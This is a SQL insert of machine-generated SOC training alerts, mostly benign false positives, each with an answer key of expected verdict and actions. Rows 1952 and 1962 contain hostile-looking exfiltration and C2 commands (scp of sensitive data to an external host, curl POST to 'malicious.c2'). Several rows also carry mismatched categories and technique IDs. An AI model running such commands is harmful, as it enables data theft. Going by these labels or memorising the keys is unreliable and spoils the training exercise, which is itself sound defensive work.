(1945, 'Authorized Administrative Backup Misflagged as Data Exfiltration', 'low', 'Corelight', 'A backup process transferring large data volumes to a remote site was incorrectly flagged as potential data exfiltration.', 'Data Exfil', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"command_line\":\"rsync -avz /data/backup 192.168.1.200:/backup\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP belongs to authorized backup server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data/backup 192.168.1.200:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command corresponds to scheduled backup task\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer is part of a regular backup schedule, not unauthorized exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1946, 'Misconfigured Legacy App Triggers Network Anomaly Alert', 'medium', 'Suricata', 'A legacy application generated unusual network traffic patterns, mistakenly identified as suspicious activity.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:05:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"192.168.1.80\",\"hostname\":\"legacy-app-server\",\"command_line\":\"/usr/bin/legacyapp -connect 192.168.1.80\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/legacyapp -connect 192.168.1.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Observed traffic pattern matches known legacy application behavior\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unusual traffic patterns are normal for this legacy application and not indicative of an attack.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1947, 'System Health Check Mistaken for Lateral Movement', 'medium', 'Wireshark', 'Network traffic from system health monitoring tools was incorrectly identified as lateral movement.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.3.5\",\"dst_ip\":\"10.0.3.10\",\"username\":\"syshealth\",\"hostname\":\"monitoring-tool\",\"command_line\":\"check_health -target 10.0.3.10\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP belongs to system health monitoring tool\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"check_health -target 10.0.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command in line with system health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic was generated by legitimate system health monitoring tools, not unauthorized access.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1948, 'Routine IT Vulnerability Scanning Detected as C2 Beaconing', 'medium', 'Zeek', 'Network traffic resembling C2 beaconing was detected from an internal IP to an external server. Upon review, this was a routine vulnerability scan.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"198.51.100.25\",\"username\":\"scanner_user\",\"hostname\":\"scan-server\",\"command_line\":\"/usr/bin/nmap -sT -p 1-65535 198.51.100.25\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity associated with this IP.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"/usr/bin/nmap -sT -p 1-65535 198.51.100.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command identified as routine vulnerability scan.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Upon investigation, it was confirmed that the network traffic was generated by an authorized vulnerability scan tool.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1949, 'Authorized Administrative Backup Mistaken for Data Exfiltration', 'low', 'Corelight', 'Data transfer activity to an external backup server was flagged as potential data exfiltration. This was an authorized backup process.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.10\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"command_line\":\"rsync -avz /data/backup/ user@203.0.113.10:/remote/backup/\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address belongs to a trusted backup service provider.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rsync -avz /data/backup/ user@203.0.113.10:/remote/backup/\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command matches authorized backup procedure.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"External data transfer was part of scheduled backup operations, confirmed by IT.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1950, 'Misconfigured Legacy App Generating Suspicious Network Traffic', 'medium', 'Suricata', 'Network traffic from a legacy application server was flagged as suspicious. The application is known to generate erratic traffic patterns.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:22:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"192.168.2.35\",\"username\":\"legacy_app_user\",\"hostname\":\"legacy-server\",\"command_line\":\"java -jar /opt/legacy/app.jar\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"java -jar /opt/legacy/app.jar\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution is part of the legacy application operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The network traffic patterns are typical for this legacy application and have been documented in historical logs.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1951, 'Benign System Health Checks Triggering Lateral Movement Alert', 'medium', 'Wireshark', 'System health check scripts were detected as possible lateral movement. These checks are part of routine maintenance.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.50\",\"dst_ip\":\"192.168.3.55\",\"username\":\"health_check_user\",\"hostname\":\"maintenance-server\",\"command_line\":\"python /scripts/health_check.py\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"python /scripts/health_check.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution is part of routine system health checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The processes observed are consistent with routine maintenance scripts executed by authorized personnel.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1952, 'Unauthorized Data Exfiltration Attempt Detected', 'critical', 'Darktrace', 'A large volume of data was observed being exfiltrated to an unauthorized external server. This activity was confirmed as an actual data breach attempt.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"compromised_user\",\"hostname\":\"compromised-machine\",\"command_line\":\"scp -r /sensitive_data/ user@203.0.113.100:/stolen_data/\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"scp -r /sensitive_data/ user@203.0.113.100:/stolen_data/\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution matches known data exfiltration patterns.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer to an unauthorized IP was confirmed as a malicious exfiltration attempt.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1953, 'Routine IT Scan Detected as Potential C2 Beaconing', 'medium', 'Zeek', 'A network scan was detected which matches the signature of C2 beaconing. The source IP belongs to the internal IT department conducting routine vulnerability assessments.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:32Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.200\",\"username\":\"it_admin\",\"hostname\":\"scanner01\",\"command_line\":\"nmap -sS 10.0.0.200\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for routine scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 10.0.0.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Standard Nmap command for scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert is a false positive as the source IP belongs to the IT department performing routine scans.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1954, 'Authorized Backup Traffic Mistaken for Data Exfiltration', 'medium', 'Suricata', 'Anomalous data transfer detected to an external IP, initially flagged as potential data exfiltration. Investigation reveals it is part of the scheduled backup routine to a cloud storage provider.', 'Data Exfiltration', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:27:19Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.50\",\"username\":\"backup_user\",\"hostname\":\"backup_server\",\"request_body\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP performing scheduled backups\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Known cloud storage provider IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert is a false positive due to the authorized nature of the backup traffic.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1955, 'Internal Health Check Misidentified as Lateral Movement', 'low', 'Corelight', 'A health check script execution was misidentified as lateral movement within the network. The script is part of regular system maintenance procedures.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:15:43Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"sysadmin\",\"hostname\":\"healthcheck01\",\"command_line\":\"check_system_health.sh\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in system health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"check_system_health.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Regular script for system health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The alert is a false positive as it involves legitimate health check activities.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1956, 'Legacy Application Misconfiguration Triggers C2 Alert', 'high', 'Darktrace', 'Anomalous outbound traffic was detected, flagged as C2 communication. The traffic originates from a misconfigured legacy application attempting to connect to an outdated external server.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:33:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.10\",\"username\":\"app_user\",\"hostname\":\"legacy_app01\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP from legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"External IP associated with outdated service\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert is a false positive due to the legacy application\'s misconfiguration. Closing the alert does not remove the exposure: the server is still making unsolicited outbound connections to an external host with a suspicious reputation, so the misconfiguration should be corrected (or the destination egress-filtered) and the fix verified, otherwise the same alert will keep firing and a real C2 channel from this host would be easy to dismiss.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1957, 'Detected C2 Beaconing Activity - True Positive', 'critical', 'Wireshark', 'Suspicious beaconing activity detected from an internal host to a known malicious external IP, indicating potential C2 communication.', 'C2 Beaconing', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:55:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"203.0.113.99\",\"username\":\"compromised_user\",\"hostname\":\"infected_host\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP showing suspicious behavior\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The alert is a true positive as it involves communication with a known malicious external IP.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1958, 'Routine IT Vulnerability Scanning Detected', 'low', 'Zeek', 'A series of network scans were detected originating from an internal server. These scans are part of routine vulnerability assessment procedures.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:15:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.255\",\"username\":\"admin\",\"hostname\":\"vuln-scan-01\",\"command_line\":\"nmap -sP 192.168.1.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sP 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine network scan command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert corresponds to a known and scheduled vulnerability scan.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1959, 'Authorized Administrative Backups Triggered Unusual Traffic Patterns', 'low', 'Suricata', 'Network traffic resembling data exfiltration detected, traced back to scheduled backup tasks from an internal server.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.50\",\"username\":\"backupadmin\",\"hostname\":\"backup-server\",\"command_line\":\"rsync -avz /data/ 10.0.0.50:/backup/\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of internal backup server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data/ 10.0.0.50:/backup/\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized backup operation\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected traffic is consistent with scheduled backup operations.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1960, 'Benign System Health Checks Mistaken for C2 Beaconing', 'low', 'Corelight', 'Network activity originally flagged as potential C2 beaconing was found to be routine system health checks by a legacy application.', 'Lateral Movement', 'T0888', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:22:33Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.20\",\"username\":\"healthcheck\",\"hostname\":\"legacy-app-01\",\"command_line\":\"curl http://192.168.2.20:8080/status\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of internal legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://192.168.2.20:8080/status\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine health check command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity is consistent with regular application health checks.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1961, 'Misconfigured Legacy App Causing False Positive C2 Alerts', 'medium', 'Darktrace', 'Network connections from a legacy application server are triggering C2 alerts due to misconfiguration. Investigation reveals routine internal application processes.', 'C2', 'T1094', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:02:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.25\",\"dst_ip\":\"10.1.1.100\",\"username\":\"legacyadmin\",\"hostname\":\"legacy-app-02\",\"command_line\":\"ping -c 5 10.1.1.100\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to a legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ping -c 5 10.1.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine network connectivity check\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2\",\"analysis_notes\":\"The detected activity is due to a known misconfiguration in the legacy application.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1962, 'True Positive: C2 Beaconing Detected from Compromised Host', 'critical', 'Wireshark', 'A compromised host within the network is exhibiting behavior consistent with command and control beaconing to an external IP.', 'C2', 'T1102', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T17:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"203.0.113.89\",\"username\":\"unknown\",\"hostname\":\"compromised-host\",\"command_line\":\"curl -X POST http://malicious.c2/command\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"curl -X POST http://malicious.c2/command\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with known C2 server\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2\",\"analysis_notes\":\"This alert is confirmed as a true positive due to the nature of the connections and external IP reputation.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1963, 'Routine IT Vulnerability Scanning Detected', 'low', 'Zeek', 'A network scan was detected originating from an internal IP. This is a routine scan performed by the IT department.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.100\",\"username\":\"it_admin\",\"hostname\":\"scan_server\",\"command_line\":\"nmap -sS 192.168.1.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address used by the IT department for scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine IT scanning command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The alert is a false positive as it involves a routine scan by IT personnel.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1964, 'Authorized Administrative Backup Activity', 'low', 'Corelight', 'Backup data transfer detected from critical server to backup storage. Verified as part of regular backup schedule.', 'Data Exfiltration', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.100\",\"username\":\"backup_service\",\"hostname\":\"main_server\",\"command_line\":\"rsync -av /data 10.0.0.100:/backup\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP representing the main server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -av /data 10.0.0.100:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Standard backup command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This is a scheduled backup operation and not unauthorized data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
